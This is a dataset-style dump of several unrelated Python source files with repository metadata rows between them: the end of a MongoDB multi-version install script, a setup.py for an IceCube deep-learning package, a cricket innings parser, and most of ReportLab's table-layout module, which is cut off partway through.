except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else: raise
CL_HELP_MESSAGE = \
"""
Downloads and installs particular mongodb versions (each binary is renamed to include its version)
into an install directory and symlinks the binaries with versions to another directory. This script
supports community and enterprise builds.
Usage: setup_multiversion_mongodb.py INSTALL_DIR LINK_DIR EDITION PLATFORM_AND_ARCH VERSION1 [VERSION2 VERSION3 ...]
EDITION is one of the following:
base (generic community builds)
enterprise
targeted (platform specific community builds, includes SSL)
PLATFORM_AND_ARCH can be specified with just a platform, i.e., OSX, if it is supported.
Ex: setup_multiversion_mongodb.py ./install ./link base "Linux/x86_64" "2.0.6" "2.0.3-rc0" "2.0" "2.2" "2.3"
Ex: setup_multiversion_mongodb.py ./install ./link enterprise "OSX" "2.4" "2.2"
After running the script you will have a directory structure like this:
./install/[mongodb-osx-x86_64-2.4.9, mongodb-osx-x86_64-2.2.7]
./link/[mongod-2.4.9, mongod-2.2.7, mongo-2.4.9...]
You should then add ./link/ to your path so multi-version tests will work.
Note: If "rc" is included in the version name, we'll use the exact rc, otherwise we'll pull the highest non-rc
version compatible with the version specified.
"""
def parse_cl_args(args):
def raise_exception(msg):
print CL_HELP_MESSAGE
raise Exception(msg)
if len(args) == 0: raise_exception("Missing INSTALL_DIR")
install_dir = args[0]
args = args[1:]
if len(args) == 0: raise_exception("Missing LINK_DIR")
link_dir = args[0]
args = args[1:]
if len(args) == 0: raise_exception("Missing EDITION")
edition = args[0]
if edition not in ['base', 'enterprise', 'targeted']:
raise Exception("Unsupported edition %s" % edition)
args = args[1:]
if len(args) == 0: raise_exception("Missing PLATFORM_AND_ARCH")
platform_arch = args[0]
args = args[1:]
if len(args) == 0: raise_exception("Missing VERSION1")
versions = args
return (MultiVersionDownloader(install_dir, link_dir, edition, platform_arch), versions)
def main():
# Listen for SIGUSR1 and dump stack if received.
try:
signal.signal(signal.SIGUSR1, dump_stacks)
except AttributeError:
print "Cannot catch signals on Windows"
downloader, versions = parse_cl_args(sys.argv[1:])
for version in versions:
downloader.download_version(version)
if __name__ == '__main__':
main()
| 40.874652
| 116
| 0.602699
|
4a0a2750c0f9d65fca60a75bc1e765c892e3a586
| 1,274
|
py
|
Python
|
setup.py
|
tglauch/DeepIceLearning_Module
|
8c05929ec97226f07ab9e13a1dfc539d0e47a2b1
|
[
"MIT"
] | 3
|
2019-10-10T22:02:47.000Z
|
2020-03-17T08:39:35.000Z
|
setup.py
|
tglauch/DeepIceLearning_Module
|
8c05929ec97226f07ab9e13a1dfc539d0e47a2b1
|
[
"MIT"
] | null | null | null |
setup.py
|
tglauch/DeepIceLearning_Module
|
8c05929ec97226f07ab9e13a1dfc539d0e47a2b1
|
[
"MIT"
] | 1
|
2020-05-11T15:49:46.000Z
|
2020-05-11T15:49:46.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import setuptools
with open("README.md") as readme:
long_description = readme.read()
setuptools.setup(
name="i3deepice",
version="0.1",
author="Theo Glauch",
author_email="theo.glauch@tum.de",
description="DeepIceLearning Icetray Module",
long_description=long_description,
long_description_content_type="text/x-rst",
url="https://github.com/tglauch/i3deepice/",
project_urls={
"Source": "https://github.com/tglauch/i3deepice/",
"Tracker": "https://github.com/tglauch/i3deepice/issues/"
},
license="GPLv3",
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
"Operating System :: Unix",
"Programming Language :: Python :: 2.7",
"Topic :: Scientific/Engineering"
],
python_requires=">=2.7",
install_requires=[
'tensorflow>=1.5,<2.0',
'numpy>1.14',
'scipy>1.2.0'],
packages = setuptools.find_packages(),
package_data={"i3deepice": ["models/*/*.npy",
"models/*/*.cfg",
"lib/*.npy"]},
)
| 30.333333
| 75
| 0.579278
|
4a0a28c8b18ab62856e7813e1b2497cf81e4c210
| 830
|
py
|
Python
|
cricket_db/parsers/innings.py
|
oli5679/cricsheet-db
|
be4f3d518afc9e3012e03c45166c446467abca73
|
[
"MIT"
] | 2
|
2020-01-21T10:50:35.000Z
|
2020-12-28T11:09:20.000Z
|
cricket_db/parsers/innings.py
|
berianjames/cricsheet-db
|
be4f3d518afc9e3012e03c45166c446467abca73
|
[
"MIT"
] | null | null | null |
cricket_db/parsers/innings.py
|
berianjames/cricsheet-db
|
be4f3d518afc9e3012e03c45166c446467abca73
|
[
"MIT"
] | 2
|
2020-01-21T10:57:16.000Z
|
2020-05-31T19:13:11.000Z
|
from cricket_db.parsers.parser import Parser
class InningsParser(Parser):
def __init__(self, match_id, innings_number):
self.match_id = match_id
self.innings_number = innings_number
def parse(self, raw):
innings = {
'match_id': self.match_id,
'innings_number': self.innings_number,
'batting_team': raw['team'],
'was_declared': ('declared' in raw)
}
if 'penalty_runs' in raw:
innings.update(self.__penalty_runs_parser(raw['penalty_runs']))
return innings
def __penalty_runs_parser(self, penalty_runs):
return {
'penalty_runs_pre': penalty_runs['pre'] if 'pre' in penalty_runs else None,
'penalty_runs_post': penalty_runs['post'] if 'post' in penalty_runs else None
}
| 33.2
| 89
| 0.626506
|
4a0a298f54dafddcb2464359bb01b641473951e1
| 66,188
|
py
|
Python
|
dist-packages/reportlab/platypus/tables.py
|
Jianwei-Wang/python2.7_lib
|
911b8e81512e5ac5f13e669ab46f7693ed897378
|
[
"PSF-2.0"
] | 1
|
2020-10-30T14:47:11.000Z
|
2020-10-30T14:47:11.000Z
|
dist-packages/reportlab/platypus/tables.py
|
Jianwei-Wang/python2.7_lib
|
911b8e81512e5ac5f13e669ab46f7693ed897378
|
[
"PSF-2.0"
] | 7
|
2021-02-08T20:22:15.000Z
|
2022-03-11T23:19:41.000Z
|
dist-packages/reportlab/platypus/tables.py
|
Jianwei-Wang/python2.7_lib
|
911b8e81512e5ac5f13e669ab46f7693ed897378
|
[
"PSF-2.0"
] | null | null | null |
#Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/tables.py
__version__=''' $Id$ '''
__doc__="""
Tables are created by passing the constructor a tuple of column widths, a tuple of row heights and the data in
row order. Drawing of the table can be controlled by using a TableStyle instance. This allows control of the
color and weight of the lines (if any), and the font, alignment and padding of the text.
None values in the sequence of row heights or column widths, mean that the corresponding rows
or columns should be automatically sized.
All the cell values should be convertible to strings; embedded newline '\\n' characters
cause the value to wrap (ie are like a traditional linefeed).
See the test output from running this module as a script for a discussion of the method for constructing
tables and table styles.
"""
from reportlab.platypus.flowables import Flowable, Preformatted, Spacer
from reportlab import rl_config
from reportlab.lib.styles import PropertySet, ParagraphStyle, _baseFontName
from reportlab.lib import colors
from reportlab.lib.utils import annotateException, IdentStr, flatten, isStr, asNative, strTypes
from reportlab.lib.rl_accel import fp_str
from reportlab.lib.abag import ABag as CellFrame
from reportlab.pdfbase.pdfmetrics import stringWidth
from reportlab.platypus.doctemplate import Indenter
from reportlab.platypus.flowables import LIIndenter
LINECAPS={None: None, 'butt':0,'round':1,'projecting':2,'squared':2}
LINEJOINS={None: None, 'miter':0, 'mitre':0, 'round':1,'bevel':2}
class CellStyle(PropertySet):
fontname = _baseFontName
fontsize = 10
leading = 12
leftPadding = 6
rightPadding = 6
topPadding = 3
bottomPadding = 3
firstLineIndent = 0
color = 'black'
alignment = 'LEFT'
background = 'white'
valign = "BOTTOM"
href = None
destination = None
def __init__(self, name, parent=None):
self.name = name
if parent is not None:
parent.copy(self)
def copy(self, result=None):
if result is None:
result = CellStyle()
for name in dir(self):
setattr(result, name, getattr(self, name))
return result
class TableStyle:
def __init__(self, cmds=None, parent=None, **kw):
#handle inheritance from parent first.
commands = []
if parent:
# copy the parents list at construction time
commands = commands + parent.getCommands()
self._opts = parent._opts
for a in ('spaceBefore','spaceAfter'):
if hasattr(parent,a):
setattr(self,a,getattr(parent,a))
if cmds:
commands = commands + list(cmds)
self._cmds = commands
self._opts={}
self._opts.update(kw)
def add(self, *cmd):
self._cmds.append(cmd)
def __repr__(self):
return "TableStyle(\n%s\n) # end TableStyle" % " \n".join(map(repr, self._cmds))
def getCommands(self):
return self._cmds
def _rowLen(x):
return not isinstance(x,(tuple,list)) and 1 or len(x)
def _calc_pc(V,avail):
'''check list V for percentage or * values
1) absolute values go through unchanged
2) percentages are used as weights for unconsumed space
3) if no None values were seen '*' weights are
set equally with unclaimed space
otherwise * weights are assigned as None'''
R = []
r = R.append
I = []
i = I.append
J = []
j = J.append
s = avail
w = n = 0.
for v in V:
if isinstance(v,strTypes):
v = str(v).strip()
if not v:
v = None
n += 1
elif v.endswith('%'):
v = float(v[:-1])
w += v
i(len(R))
elif v=='*':
j(len(R))
else:
v = float(v)
s -= v
elif v is None:
n += 1
else:
s -= v
r(v)
s = max(0.,s)
f = s/max(100.,w)
for i in I:
R[i] *= f
s -= R[i]
s = max(0.,s)
m = len(J)
if m:
v = n==0 and s/m or None
for j in J:
R[j] = v
return R
def _hLine(canvLine, scp, ecp, y, hBlocks, FUZZ=rl_config._FUZZ):
'''
Draw horizontal lines; do not draw through regions specified in hBlocks
This also serves for vertical lines with a suitable canvLine
'''
if hBlocks: hBlocks = hBlocks.get(y,None)
if not hBlocks or scp>=hBlocks[-1][1]-FUZZ or ecp<=hBlocks[0][0]+FUZZ:
canvLine(scp,y,ecp,y)
else:
i = 0
n = len(hBlocks)
while scp<ecp-FUZZ and i<n:
x0, x1 = hBlocks[i]
if x1<=scp+FUZZ or x0>=ecp-FUZZ:
i += 1
continue
i0 = max(scp,x0)
i1 = min(ecp,x1)
if i0>scp: canvLine(scp,y,i0,y)
scp = i1
if scp<ecp-FUZZ: canvLine(scp,y,ecp,y)
def _multiLine(scp,ecp,y,canvLine,ws,count):
offset = 0.5*(count-1)*ws
y += offset
for idx in range(count):
canvLine(scp, y, ecp, y)
y -= ws
def _convert2int(value, map, low, high, name, cmd):
'''private converter tries map(value) low<=int(value)<=high or finally an error'''
try:
return map[value]
except KeyError:
try:
ivalue = int(value)
if low<=ivalue<=high: return ivalue
except:
pass
raise ValueError('Bad %s value %s in %s'%(name,value,ascii(cmd)))
def _endswith(obj,s):
try:
return obj.endswith(s)
except:
return 0
def spanFixDim(V0,V,spanCons,lim=None,FUZZ=rl_config._FUZZ):
#assign required space to variable rows equally to existing calculated values
M = {}
if not lim: lim = len(V0) #in longtables the row calcs may be truncated
for (x0,x1),v in spanCons.items():
if x0>=lim: continue
x1 += 1
t = sum([V[x]+M.get(x,0) for x in range(x0,x1)])
if t>=v-FUZZ: continue #already good enough
X = [x for x in range(x0,x1) if V0[x] is None] #variable candidates
if not X: continue #something wrong here mate
v -= t
v /= float(len(X))
for x in X:
M[x] = M.get(x,0)+v
for x,v in M.items():
V[x] += v
class _ExpandedCellTuple(tuple):
pass
class Table(Flowable):
def __init__(self, data, colWidths=None, rowHeights=None, style=None,
repeatRows=0, repeatCols=0, splitByRow=1, emptyTableAction=None, ident=None,
hAlign=None,vAlign=None, normalizedData=0, cellStyles=None):
self.ident = ident
self.hAlign = hAlign or 'CENTER'
self.vAlign = vAlign or 'MIDDLE'
if not isinstance(data,(tuple,list)):
raise ValueError("%s invalid data type" % self.identity())
self._nrows = nrows = len(data)
self._cellvalues = []
_seqCW = isinstance(colWidths,(tuple,list))
_seqRH = isinstance(rowHeights,(tuple,list))
if nrows: self._ncols = ncols = max(list(map(_rowLen,data)))
elif colWidths and _seqCW: ncols = len(colWidths)
else: ncols = 0
if not emptyTableAction: emptyTableAction = rl_config.emptyTableAction
self._longTableOptimize = getattr(self,'_longTableOptimize',rl_config.longTableOptimize)
if not (nrows and ncols):
if emptyTableAction=='error':
raise ValueError("%s must have at least a row and column" % self.identity())
elif emptyTableAction=='indicate':
self.__class__ = Preformatted
global _emptyTableStyle
if '_emptyTableStyle' not in list(globals().keys()):
_emptyTableStyle = ParagraphStyle('_emptyTableStyle')
_emptyTableStyle.textColor = colors.red
_emptyTableStyle.backColor = colors.yellow
Preformatted.__init__(self,'%s(%d,%d)' % (self.__class__.__name__,nrows,ncols), _emptyTableStyle)
elif emptyTableAction=='ignore':
self.__class__ = Spacer
Spacer.__init__(self,0,0)
else:
raise ValueError('%s bad emptyTableAction: "%s"' % (self.identity(),emptyTableAction))
return
# we need a cleanup pass to ensure data is strings - non-unicode and non-null
if normalizedData:
self._cellvalues = data
else:
self._cellvalues = data = self.normalizeData(data)
if not _seqCW: colWidths = ncols*[colWidths]
elif len(colWidths)!=ncols:
if rl_config.allowShortTableRows and isinstance(colWidths,list):
n = len(colWidths)
if n<ncols:
colWidths[n:] = (ncols-n)*[colWidths[-1]]
else:
colWidths = colWidths[:ncols]
else:
raise ValueError("%s data error - %d columns in data but %d in column widths" % (self.identity(),ncols, len(colWidths)))
if not _seqRH: rowHeights = nrows*[rowHeights]
elif len(rowHeights) != nrows:
raise ValueError("%s data error - %d rows in data but %d in row heights" % (self.identity(),nrows, len(rowHeights)))
for i,d in enumerate(data):
n = len(d)
if n!=ncols:
if rl_config.allowShortTableRows and isinstance(d,list):
d[n:] = (ncols-n)*['']
else:
raise ValueError("%s expected %d not %d columns in row %d!" % (self.identity(),ncols,n,i))
self._rowHeights = self._argH = rowHeights
self._colWidths = self._argW = colWidths
if cellStyles is None:
cellrows = []
for i in range(nrows):
cellcols = []
for j in range(ncols):
cellcols.append(CellStyle(repr((i,j))))
cellrows.append(cellcols)
self._cellStyles = cellrows
else:
self._cellStyles = cellStyles
self._bkgrndcmds = []
self._linecmds = []
self._spanCmds = []
self._nosplitCmds = []
self.repeatRows = repeatRows
self.repeatCols = repeatCols
self.splitByRow = splitByRow
if style:
self.setStyle(style)
def __repr__(self):
"incomplete, but better than nothing"
r = getattr(self,'_rowHeights','[unknown]')
c = getattr(self,'_colWidths','[unknown]')
cv = getattr(self,'_cellvalues','[unknown]')
import pprint
cv = pprint.pformat(cv)
cv = cv.replace("\n", "\n ")
return "%s(\n rowHeights=%s,\n colWidths=%s,\n%s\n) # end table" % (self.__class__.__name__,r,c,cv)
def normalizeData(self, data):
"""Takes a block of input data (list of lists etc.) and
- coerces unicode strings to non-unicode UTF8
- coerces nulls to ''
-
"""
def normCell(stuff):
if stuff is None:
return ''
elif isStr(stuff):
return asNative(stuff)
else:
return stuff
outData = []
for row in data:
outRow = [normCell(cell) for cell in row]
outData.append(outRow)
from pprint import pprint as pp
#pp(outData)
return outData
def identity(self, maxLen=30):
'''Identify our selves as well as possible'''
if self.ident: return self.ident
vx = None
nr = getattr(self,'_nrows','unknown')
nc = getattr(self,'_ncols','unknown')
cv = getattr(self,'_cellvalues',None)
rh = getattr(self, '_rowHeights', None)
if cv and 'unknown' not in (nr,nc):
b = 0
for i in range(nr):
for j in range(nc):
v = cv[i][j]
if isinstance(v,(list,tuple,Flowable)):
if not isinstance(v,(tuple,list)): v = (v,)
r = ''
for vij in v:
r = vij.identity(maxLen)
if r and r[-4:]!='>...':
break
if r and r[-4:]!='>...':
ix, jx, vx, b = i, j, r, 1
else:
v = v is None and '' or str(v)
ix, jx, vx = i, j, v
b = (vx and isinstance(v,strTypes)) and 1 or 0
if maxLen: vx = vx[:maxLen]
if b: break
if b: break
if rh: #find tallest row, it's of great interest'
tallest = '(tallest row %d)' % int(max(rh))
else:
tallest = ''
if vx:
vx = ' with cell(%d,%d) containing\n%s' % (ix,jx,repr(vx))
else:
vx = '...'
return "<%s@0x%8.8X %s rows x %s cols%s>%s" % (self.__class__.__name__, id(self), nr, nc, tallest, vx)
def _cellListIter(self,C,aW,aH):
canv = getattr(self,'canv',None)
for c in C:
if getattr(c,'__split_only__',None):
for d in c.splitOn(canv,aW,aH):
yield d
else:
yield c
def _cellListProcess(self,C,aW,aH):
if not isinstance(C,_ExpandedCellTuple):
frame = None
R = [].append
for c in self._cellListIter(C,aW,aH):
if isinstance(c,Indenter):
if not frame:
frame = CellFrame(_leftExtraIndent=0,_rightExtraIndent=0)
c.frameAction(frame)
if frame._leftExtraIndent<1e-8 and frame._rightExtraIndent<1e-8:
frame = None
continue
if frame:
R(LIIndenter(c,leftIndent=frame._leftExtraIndent,rightIndent=frame._rightExtraIndent))
else:
R(c)
C = _ExpandedCellTuple(R.__self__)
return C
def _listCellGeom(self, V,w,s,W=None,H=None,aH=72000):
if not V: return 0,0
aW = w - s.leftPadding - s.rightPadding
aH = aH - s.topPadding - s.bottomPadding
t = 0
w = 0
canv = getattr(self,'canv',None)
sb0 = None
for v in V:
vw, vh = v.wrapOn(canv, aW, aH)
sb = v.getSpaceBefore()
sa = v.getSpaceAfter()
if W is not None: W.append(vw)
if H is not None: H.append(vh)
w = max(w,vw)
t += vh + sa + sb
if sb0 is None:
sb0 = sb
return w, t - sb0 - sa
def _listValueWidth(self,V,aH=72000,aW=72000):
if not V: return 0,0
t = 0
w = 0
canv = getattr(self,'canv',None)
return max([v.wrapOn(canv,aW,aH)[0] for v in V])
def _calc_width(self,availWidth,W=None):
if getattr(self,'_width_calculated_once',None): return
#comments added by Andy to Robin's slightly terse variable names
if not W: W = _calc_pc(self._argW,availWidth) #widths array
if None in W: #some column widths are not given
canv = getattr(self,'canv',None)
saved = None
if self._spanCmds:
colSpanCells = self._colSpanCells
spanRanges = self._spanRanges
else:
colSpanCells = ()
spanRanges = {}
spanCons = {}
if W is self._argW:
W0 = W
W = W[:]
else:
W0 = W[:]
V = self._cellvalues
S = self._cellStyles
while None in W:
j = W.index(None) #find first unspecified column
w = 0
for i,Vi in enumerate(V):
v = Vi[j]
s = S[i][j]
ji = j,i
span = spanRanges.get(ji,None)
if ji in colSpanCells and not span: #if the current cell is part of a spanned region,
t = 0.0 #assume a zero size.
else:#work out size
t = self._elementWidth(v,s)
if t is None:
raise ValueError("Flowable %s in cell(%d,%d) can't have auto width\n%s" % (v.identity(30),i,j,self.identity(30)))
t += s.leftPadding+s.rightPadding
if span:
c0 = span[0]
c1 = span[2]
if c0!=c1:
x = c0,c1
spanCons[x] = max(spanCons.get(x,t),t)
t = 0
if t>w: w = t #record a new maximum
W[j] = w
if spanCons:
try:
spanFixDim(W0,W,spanCons)
except:
annotateException('\nspanning problem in %s\nW0=%r W=%r\nspanCons=%r' % (self.identity(),W0,W,spanCons))
self._colWidths = W
width = 0
self._colpositions = [0] #index -1 is right side boundary; we skip when processing cells
for w in W:
width = width + w
self._colpositions.append(width)
self._width = width
self._width_calculated_once = 1
def _elementWidth(self,v,s):
if isinstance(v,(list,tuple)):
w = 0
for e in v:
ew = self._elementWidth(e,s)
if ew is None: return None
w = max(w,ew)
return w
elif isinstance(v,Flowable) and v._fixedWidth:
if hasattr(v, 'width') and isinstance(v.width,(int,float)): return v.width
if hasattr(v, 'drawWidth') and isinstance(v.drawWidth,(int,float)): return v.drawWidth
# Even if something is fixedWidth, the attribute to check is not
# necessarily consistent (cf. Image.drawWidth). Therefore, we'll
# be extra-careful and fall through to this code if necessary.
if hasattr(v, 'minWidth'):
try:
w = v.minWidth() # should be all flowables
if isinstance(w,(float,int)): return w
except AttributeError:
pass
if v is None:
return 0
else:
try:
v = str(v).split("\n")
except:
return 0
fontName = s.fontname
fontSize = s.fontsize
return max([stringWidth(x,fontName,fontSize) for x in v])
def _calc_height(self, availHeight, availWidth, H=None, W=None):
H = self._argH
if not W: W = _calc_pc(self._argW,availWidth) #widths array
hmax = lim = len(H)
longTable = self._longTableOptimize
if None in H:
canv = getattr(self,'canv',None)
saved = None
#get a handy list of any cells which span rows. should be ignored for sizing
if self._spanCmds:
rowSpanCells = self._rowSpanCells
colSpanCells = self._colSpanCells
spanRanges = self._spanRanges
colpositions = self._colpositions
else:
rowSpanCells = colSpanCells = ()
spanRanges = {}
if canv: saved = canv._fontname, canv._fontsize, canv._leading
H0 = H
H = H[:] #make a copy as we'll change it
self._rowHeights = H
spanCons = {}
FUZZ = rl_config._FUZZ
while None in H:
i = H.index(None)
V = self._cellvalues[i] # values for row i
S = self._cellStyles[i] # styles for row i
h = 0
j = 0
for j,(v, s, w) in enumerate(list(zip(V, S, W))): # value, style, width (lengths must match)
ji = j,i
span = spanRanges.get(ji,None)
if ji in rowSpanCells and not span:
continue # don't count it, it's either occluded or unreliable
else:
if isinstance(v,(tuple,list,Flowable)):
if isinstance(v,Flowable): v = (v,)
else: v = flatten(v)
v = V[j] = self._cellListProcess(v,w,None)
if w is None and not self._canGetWidth(v):
raise ValueError("Flowable %s in cell(%d,%d) can't have auto width in\n%s" % (v[0].identity(30),i,j,self.identity(30)))
if canv: canv._fontname, canv._fontsize, canv._leading = s.fontname, s.fontsize, s.leading or 1.2*s.fontsize
if ji in colSpanCells:
if not span: continue
w = max(colpositions[span[2]+1]-colpositions[span[0]],w)
dW,t = self._listCellGeom(v,w or self._listValueWidth(v),s)
if canv: canv._fontname, canv._fontsize, canv._leading = saved
dW = dW + s.leftPadding + s.rightPadding
if not rl_config.allowTableBoundsErrors and dW>w:
from reportlab.platypus.doctemplate import LayoutError
raise LayoutError("Flowable %s (%sx%s points) too wide for cell(%d,%d) (%sx* points) in\n%s" % (v[0].identity(30),fp_str(dW),fp_str(t),i,j, fp_str(w), self.identity(30)))
else:
v = (v is not None and str(v) or '').split("\n")
t = (s.leading or 1.2*s.fontsize)*len(v)
t += s.bottomPadding+s.topPadding
if span:
r0 = span[1]
r1 = span[3]
if r0!=r1:
x = r0,r1
spanCons[x] = max(spanCons.get(x,t),t)
t = 0
if t>h: h = t #record a new maximum
H[i] = h
# we can stop if we have filled up all available room
if longTable:
hmax = i
height = sum(H[:i])
if height > availHeight:
#we can terminate if all spans are complete in H[:i]
if spanCons:
msr = max([x[1] for x in spanCons.keys()]) #RS=[endrowspan,.....]
if hmax>=msr:
break
if None not in H: hmax = lim
if spanCons:
try:
spanFixDim(H0,H,spanCons,lim=hmax)
except:
annotateException('\nspanning problem in %s hmax=%s lim=%s avail=%s x %s\nH0=%r H=%r\nspanCons=%r' % (self.identity(),hmax,lim,availWidth,availHeight,H0,H,spanCons))
height = self._height = sum(H[:hmax])
self._rowpositions = [height] # index 0 is actually topline; we skip when processing cells
for h in H[:hmax]:
height -= h
self._rowpositions.append(height)
assert abs(height)<1e-8, '!!!!!%s\ninternal height error height=%r hmax=%d Sum(H[:%d])=%r\nH=%r\nrowPositions=%r' % (self.identity(),height,hmax,hmax,self._height,H[:hmax],self._rowpositions)
self._hmax = hmax
def _calc(self, availWidth, availHeight):
#if hasattr(self,'_width'): return
#in some cases there are unsizable things in
#cells. If so, apply a different algorithm
#and assign some withs in a less (thanks to Gary Poster) dumb way.
#this CHANGES the widths array.
if (None in self._colWidths or '*' in self._colWidths) and self._hasVariWidthElements():
W = self._calcPreliminaryWidths(availWidth) #widths
else:
W = None
# need to know which cells are part of spanned
# ranges, so _calc_height and _calc_width can ignore them
# in sizing
if self._spanCmds:
self._calcSpanRanges()
if None in self._argH:
self._calc_width(availWidth,W=W)
if self._nosplitCmds:
self._calcNoSplitRanges()
# calculate the full table height
self._calc_height(availHeight,availWidth,W=W)
# calculate the full table width
self._calc_width(availWidth,W=W)
if self._spanCmds:
#now work out the actual rect for each spanned cell from the underlying grid
self._calcSpanRects()
def _culprit(self):
"""Return a string describing the tallest element.
Usually this is what causes tables to fail to split. Currently
tables are the only items to have a '_culprit' method. Doctemplate
checks for it.
"""
rh = self._rowHeights
tallest = max(rh)
rowNum = rh.index(tallest)
#rowNum of limited interest as usually it's a split one
#and we see row #1. Text might be a nice addition.
return 'tallest cell %0.1f points' % tallest
def _hasVariWidthElements(self, upToRow=None):
"""Check for flowables in table cells and warn up front.
Allow a couple which we know are fixed size such as
images and graphics."""
if upToRow is None: upToRow = self._nrows
for row in range(min(self._nrows, upToRow)):
for col in range(self._ncols):
value = self._cellvalues[row][col]
if not self._canGetWidth(value):
return 1
return 0
def _canGetWidth(self, thing):
"Can we work out the width quickly?"
if isinstance(thing,(list, tuple)):
for elem in thing:
if not self._canGetWidth(elem):
return 0
return 1
elif isinstance(thing, Flowable):
return thing._fixedWidth # must loosen this up
else: #str, number, None etc.
#anything else gets passed to str(...)
# so should be sizable
return 1
def _calcPreliminaryWidths(self, availWidth):
"""Fallback algorithm for when main one fails.
Where exact width info not given but things like
paragraphs might be present, do a preliminary scan
and assign some best-guess values."""
W = list(self._argW) # _calc_pc(self._argW,availWidth)
verbose = 0
totalDefined = 0.0
percentDefined = 0
percentTotal = 0
numberUndefined = 0
numberGreedyUndefined = 0
for w in W:
if w is None:
numberUndefined += 1
elif w == '*':
numberUndefined += 1
numberGreedyUndefined += 1
elif _endswith(w,'%'):
percentDefined += 1
percentTotal += float(w[:-1])
else:
assert isinstance(w,(int,float))
totalDefined = totalDefined + w
if verbose: print('prelim width calculation. %d columns, %d undefined width, %0.2f units remain' % (
self._ncols, numberUndefined, availWidth - totalDefined))
#check columnwise in each None column to see if they are sizable.
given = []
sizeable = []
unsizeable = []
minimums = {}
totalMinimum = 0
elementWidth = self._elementWidth
for colNo in range(self._ncols):
w = W[colNo]
if w is None or w=='*' or _endswith(w,'%'):
siz = 1
final = 0
for rowNo in range(self._nrows):
value = self._cellvalues[rowNo][colNo]
style = self._cellStyles[rowNo][colNo]
pad = style.leftPadding+style.rightPadding
new = elementWidth(value,style)
if new:
new += pad
else:
new = pad
new += style.leftPadding+style.rightPadding
final = max(final, new)
siz = siz and self._canGetWidth(value) # irrelevant now?
if siz:
sizeable.append(colNo)
else:
unsizeable.append(colNo)
minimums[colNo] = final
totalMinimum += final
else:
given.append(colNo)
if len(given) == self._ncols:
return
if verbose: print('predefined width: ',given)
if verbose: print('uncomputable width: ',unsizeable)
if verbose: print('computable width: ',sizeable)
# how much width is left:
remaining = availWidth - (totalMinimum + totalDefined)
if remaining > 0:
# we have some room left; fill it.
definedPercentage = (totalDefined/availWidth)*100
percentTotal += definedPercentage
if numberUndefined and percentTotal < 100:
undefined = numberGreedyUndefined or numberUndefined
defaultWeight = (100-percentTotal)/undefined
percentTotal = 100
defaultDesired = (defaultWeight/percentTotal)*availWidth
else:
defaultWeight = defaultDesired = 1
# we now calculate how wide each column wanted to be, and then
# proportionately shrink that down to fit the remaining available
# space. A column may not shrink less than its minimum width,
# however, which makes this a bit more complicated.
desiredWidths = []
totalDesired = 0
effectiveRemaining = remaining
for colNo, minimum in minimums.items():
w = W[colNo]
if _endswith(w,'%'):
desired = (float(w[:-1])/percentTotal)*availWidth
elif w == '*':
desired = defaultDesired
else:
desired = not numberGreedyUndefined and defaultDesired or 1
if desired <= minimum:
W[colNo] = minimum
else:
desiredWidths.append(
(desired-minimum, minimum, desired, colNo))
totalDesired += desired
effectiveRemaining += minimum
if desiredWidths: # else we're done
# let's say we have two variable columns. One wanted
# 88 points, and one wanted 264 points. The first has a
# minWidth of 66, and the second of 55. We have 71 points
# to divide up in addition to the totalMinimum (i.e.,
# remaining==71). Our algorithm tries to keep the proportion
# of these variable columns.
#
# To do this, we add up the minimum widths of the variable
# columns and the remaining width. That's 192. We add up the
# totalDesired width. That's 352. That means we'll try to
# shrink the widths by a proportion of 192/352--.545454.
# That would make the first column 48 points, and the second
# 144 points--adding up to the desired 192.
#
# Unfortunately, that's too small for the first column. It
# must be 66 points. Therefore, we go ahead and save that
# column width as 88 points. That leaves (192-88==) 104
# points remaining. The proportion to shrink the remaining
# column is (104/264), which, multiplied by the desired
# width of 264, is 104: the amount assigned to the remaining
# column.
proportion = effectiveRemaining/totalDesired
# we sort the desired widths by difference between desired and
# and minimum values, a value called "disappointment" in the
# code. This means that the columns with a bigger
# disappointment will have a better chance of getting more of
# the available space.
desiredWidths.sort()
finalSet = []
for disappointment, minimum, desired, colNo in desiredWidths:
adjusted = proportion * desired
if adjusted < minimum:
W[colNo] = minimum
totalDesired -= desired
effectiveRemaining -= minimum
if totalDesired:
proportion = effectiveRemaining/totalDesired
else:
finalSet.append((minimum, desired, colNo))
for minimum, desired, colNo in finalSet:
adjusted = proportion * desired
assert adjusted >= minimum
W[colNo] = adjusted
else:
for colNo, minimum in minimums.items():
W[colNo] = minimum
if verbose: print('new widths are:', W)
self._argW = self._colWidths = W
return W
def minWidth(self):
W = list(self._argW)
width = 0
elementWidth = self._elementWidth
rowNos = range(self._nrows)
values = self._cellvalues
styles = self._cellStyles
for colNo in range(len(W)):
w = W[colNo]
if w is None or w=='*' or _endswith(w,'%'):
final = 0
for rowNo in rowNos:
value = values[rowNo][colNo]
style = styles[rowNo][colNo]
new = (elementWidth(value,style)+
style.leftPadding+style.rightPadding)
final = max(final, new)
width += final
else:
width += float(w)
return width # XXX + 1/2*(left and right border widths)
def _calcSpanRanges(self):
"""Work out rects for tables which do row and column spanning.
This creates some mappings to let the later code determine
if a cell is part of a "spanned" range.
self._spanRanges shows the 'coords' in integers of each
'cell range', or None if it was clobbered:
(col, row) -> (col0, row0, col1, row1)
Any cell not in the key is not part of a spanned region
"""
self._spanRanges = spanRanges = {}
for x in range(self._ncols):
for y in range(self._nrows):
spanRanges[x,y] = (x, y, x, y)
self._colSpanCells = []
self._rowSpanCells = []
csa = self._colSpanCells.append
rsa = self._rowSpanCells.append
for (cmd, start, stop) in self._spanCmds:
x0, y0 = start
x1, y1 = stop
#normalize
if x0 < 0: x0 = x0 + self._ncols
if x1 < 0: x1 = x1 + self._ncols
if y0 < 0: y0 = y0 + self._nrows
if y1 < 0: y1 = y1 + self._nrows
if x0 > x1: x0, x1 = x1, x0
if y0 > y1: y0, y1 = y1, y0
if x0!=x1 or y0!=y1:
if x0!=x1: #column span
for y in range(y0, y1+1):
for x in range(x0,x1+1):
csa((x,y))
if y0!=y1: #row span
for y in range(y0, y1+1):
for x in range(x0,x1+1):
rsa((x,y))
for y in range(y0, y1+1):
for x in range(x0,x1+1):
spanRanges[x,y] = None
# set the main entry
spanRanges[x0,y0] = (x0, y0, x1, y1)
